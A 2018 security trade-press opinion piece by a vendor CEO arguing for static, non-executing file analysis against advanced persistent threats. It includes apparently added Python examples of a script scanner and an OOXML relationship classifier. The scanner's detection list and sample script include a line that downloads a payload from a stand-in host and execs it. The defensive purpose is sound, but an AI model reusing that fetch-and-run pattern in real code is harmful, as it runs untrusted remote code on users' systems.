
Security Management | News Analysis - Security Now
7/6/2018 09:35 AM
Boris Vaynberg

APTs: Now's the Time for a New Approach

Advanced Persistent Threats, or APTs, are one of the greatest problems that enterprises face today. However, security teams have been taking the wrong approach...

By every estimate, Advanced Persistent Threats (APTs) are rising at an exponential rate. A massive industry of cybersecurity products, going far beyond early-generation anti-virus and firewall solutions, has sprung up to combat these new threats at the various stages of the exploitation lifecycle.

Although APTs may vary significantly from each other, there's one clear common denominator that is at the heart of every successful attack.

Traditional defenses, even the most advanced ones such as sandboxing, have all been built on the assumption that sufficiently advanced techniques can detect "malicious intent" and separate it from "good content." This game of cat and mouse is what the industry is experiencing today, and it is one the attackers are winning as they continue to evolve their techniques to work around "heuristic" detection.

These types of technologies, however, have a high rate of misdetection and false alarms.

But what happens if there is a "weakest link" -- common for all or most cyber attacks -- that could invert the situation, giving the defender the upper hand?

Finding common ground in APT
In order to establish a beachhead, attackers need to get a "piece" of executable code, or other active content, onto a machine in the target network. They will use any number of methods, such as spear phishing, to get a user to access malicious content. To avoid detection, the executable code -- shellcode -- is hidden in data objects, such as Office documents, and executed by exploiting vulnerabilities in common applications -- Adobe PDF Reader, for example.

The impact can be staggering, with cybercrime damages expected to hit $6 trillion annually by 2021, according to a Cybersecurity Ventures report.

Prevent rather than remediate
APTs continue to use a familiar route to achieve exploitation. According to Mandiant's M-Trends, details of the exploitation lifecycle can be summed up as follows:

  • Step 1: Reconnaissance
  • Step 2: Initial Intrusion into Network
  • Step 3: Establish Network Backdoor
  • Step 4: Obtain User Credentials
  • Step 5: Install Various Utilities
  • Step 6: Privilege Escalation/Lateral Movement/Data Exfiltration
  • Step 7: Maintain Persistence

However, it's Step 2 -- the initial intrusion -- that remains the critical step for APT operators.

Gaining a beachhead in the target environment is the primary goal of the initial intrusion. Once a network is exploited, the attacker usually places malware on the compromised system and uses it as a starting point or proxy for further actions. Malware placed during the initial intrusion phase is commonly a simple downloader -- a basic Remote Access Trojan or a simple shell.

The problem is that few cybersecurity tools can detect shellcode that uses dynamic packers for which no known signatures and patterns are available.

It's clear that preventing an intrusion early -- before the need for costly remediation -- is the best, and cheapest, practice for fighting APTs. In 60% of cases, attackers are able to compromise an organization within minutes, but it takes most businesses nearly 200 days to detect a breach on their network, which means remediation costs skyrocket.

Detecting the evasive
Attackers still possess the edge, particularly with zero-day exploits, despite considerable security investment. Traditional cybersecurity software often becomes counter-productive: it identifies malicious threats by running them and analyzing their questionable behavior inside the threat's target environment.

To stay ahead, you need an elegant security protection architecture that is evasion-proof.

Instead, an evasion-proof architecture systematically scans incoming files for hidden code instructions -- or any other commands that might indicate malicious intent -- without opening or executing them. By looking at the code rather than the exploit it carries, no doomsday device is set off: the platform can catch any suspicious code, place it in quarantine and review it later.

Ultimately, no malicious code can "evade" detection because it never gets a chance to execute itself.



Similarly, such a platform would analyze and interpret scripts with a proprietary limited interpreter that evaluates every single statement line by line. Every possible flow of execution, including every conditional branch, is exposed and normalized.
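As an added example (not Solebit's code or the platform described here), a small Python scanner that does what this paragraph describes on a constructed sample script: it parses the script without executing it, visits both arms of every conditional, and folds split-up string literals back together so the normalized value can be checked. The suspect-call list and the sample script are assumptions.

```python
import ast

# Calls worth flagging when they can execute on any path (assumed list).
SUSPECT_CALLS = {"exec", "eval", "urlopen", "system", "Popen"}

def fold(node, consts):
    """Statically reduce a string-building expression ('a' + 'b', or a name
    bound earlier to such a string) to one literal; None if unresolvable."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.Name):
        return consts.get(node.id)
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = fold(node.left, consts), fold(node.right, consts)
        if left is not None and right is not None:
            return left + right
    return None

def scan_script(source):
    """Parse but never execute. ast.walk visits every statement, so both arms
    of every if/else are inspected no matter which one a real run takes."""
    tree = ast.parse(source)
    consts = {}
    for node in ast.walk(tree):  # pass 1: names bound to foldable strings
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)):
            value = fold(node.value, consts)
            if value is not None:
                consts[node.targets[0].id] = value
    findings = []
    for node in ast.walk(tree):  # pass 2: suspect calls, args normalized
        if isinstance(node, ast.Call):
            func = node.func
            name = getattr(func, "id", None) or getattr(func, "attr", None)
            if name in SUSPECT_CALLS:
                args = [fold(a, consts) for a in node.args]
                findings.append((node.lineno, name, [a for a in args if a]))
    return sorted(findings)

# Constructed sample: URL split into pieces, download guarded by a check that a
# dynamic run may never satisfy. Nothing in it is ever executed by the scanner.
SAMPLE = '''
import os, urllib.request
stage = "http://" + "exa" + "mple.invalid" + "/update.bin"
if os.environ.get("RUN_UPDATE") == "1":
    payload = urllib.request.urlopen(stage).read()
    exec(payload)
else:
    print("idle")
'''
```

Running `scan_script(SAMPLE)` reports the `urlopen` call on line 5 with the reassembled URL and the `exec` call on line 6, even though a dynamic run without `RUN_UPDATE` set would never reach either.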

When it comes to malicious URLs, the platform could accurately detect and differentiate between hyperlinks and automatically invoked remote objects, yielding information on the purpose of every remote object, and its behavior. It would determine the type of embedding used, even without the need to fetch the actual remote file or object, figure out its level of maliciousness in real time, and block even the most evasive malware.
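As an added example of separating hyperlinks from automatically invoked remote objects without fetching anything (not the vendor's code), the following Python reads a constructed OOXML .rels part and classifies each external relationship by whether the application resolves it on open or only on a click. The set of auto-invoked relationship types is an assumed, representative subset.

```python
import xml.etree.ElementTree as ET

PKG = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types the Office application resolves by itself when the file
# is opened, versus ones that wait for a click (assumption: a representative
# subset, not a complete list of OOXML relationship types).
AUTO_INVOKED = {"oleObject", "attachedTemplate", "image"}
USER_INVOKED = {"hyperlink"}

def classify_rels(rels_xml):
    """Return [(rId, kind, target)] for every external relationship in a .rels
    part: 'auto' (fetched on open), 'click' (needs user action) or 'unknown'.
    Only the package metadata is read; no target is ever fetched."""
    out = []
    for rel in ET.fromstring(rels_xml).iter(PKG + "Relationship"):
        if rel.get("TargetMode") != "External":
            continue  # internal parts live inside the package itself
        rtype = rel.get("Type", "")
        rtype = rtype[len(REL):] if rtype.startswith(REL) else rtype
        if rtype in AUTO_INVOKED:
            kind = "auto"
        elif rtype in USER_INVOKED:
            kind = "click"
        else:
            kind = "unknown"
        out.append((rel.get("Id"), kind, rel.get("Target")))
    return out

# Constructed sample .rels content (targets use the reserved .invalid TLD).
SAMPLE_RELS = f"""<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="{REL}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{REL}hyperlink" Target="https://example.invalid/page" TargetMode="External"/>
  <Relationship Id="rId3" Type="{REL}attachedTemplate" Target="http://example.invalid/t.dotm" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for rid, kind, target in classify_rels(SAMPLE_RELS):
        print(rid, kind, target)
```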

Why worry about heuristic or behavioral scores, false positives and false negatives, when you can get a deterministic outcome with detailed metadata for deep forensic analysis?

By not relying on underlying technology stack variations or requiring a carefully curated environment for runtime analysis, an evasion-proof architecture is incredibly effective in stopping today's attacker whether known or unknown, and is, as such, future ready as well.

Boris Vaynberg is CEO and a co-founder of Solebit. His previous experience includes positions at Elbit Systems' Intelligence and Cyber Solutions division and Comsec Consulting's Information Security division. He also served for six years in an elite technology unit of the Israel Defense Forces (IDF).
